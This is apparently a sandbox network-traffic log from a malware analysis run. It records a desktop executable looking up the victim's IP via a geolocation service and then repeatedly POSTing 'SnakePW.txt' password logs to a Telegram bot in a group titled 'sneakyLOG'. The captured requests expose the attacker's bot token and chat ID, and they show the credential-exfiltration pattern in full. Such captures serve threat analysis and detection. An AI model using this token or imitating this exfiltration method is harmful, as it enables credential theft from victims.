2024-09-27 10:52:18 UTC	673	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8894 Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmTNButmyUYGcro3gu2n1BezvPB%2FWGHDoGQOTO4hmdY7Ra5%2FfKDaNQogMcFcPXemlZUPnMADHJAXNA9ip583pTynPl23TIfgFZqFghAXSFl4BGFMIXGiq1l5jtoWOCYjsm5e0DrY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9af188bd775e82-EWR
2024-09-27 10:52:18 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 10:52:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49718	188.114.96.3	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:20 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-27 10:52:20 UTC	679	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8896 Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTntcFgbmdvj8%2FYLzhURpKsGdXSkgNnEqIK0XUfaY3eGFZt4KrTknTE7KpPZHvDtGo9nzCN142VO2wnoiJLMI6tmo%2FbOld0qF%2BOz%2Fj88wc%2BEunmaUWspTji3Gnv7JD5mqFOkxrJL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9af1933bc64211-EWR
2024-09-27 10:52:20 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 10:52:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49724	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:26 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcdf51b32e3f53 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:26 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 35 31 62 33 32 65 33 66 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcdf51b32e3f53Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:27 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:27 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 34 37 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36890,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434347,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49725	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:37 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcdfc4684c1cce Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:37 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 63 34 36 38 34 63 31 63 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcdfc4684c1cceContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:37 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:37 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 35 37 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36892,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434357,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49726	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:38 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcdfcdc23aadef Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:38 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 63 64 63 32 33 61 61 64 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcdfcdc23aadefContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:38 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:38 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 35 38 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36893,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434358,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49727	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:39 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcdfd718abc35a Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:39 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 64 37 31 38 61 62 63 33 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcdfd718abc35aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:39 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:39 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 35 39 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36894,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434359,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49728	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:40 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcdfe06a6d2a78 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:40 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 65 30 36 61 36 64 32 61 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcdfe06a6d2a78Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:40 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:40 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 30 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36895,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434360,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49729	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:41 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcdfeb0cb82203 Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:41 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 65 62 30 63 62 38 32 32 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcdfeb0cb82203Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:41 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:41 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 31 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36896,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434361,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49730	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
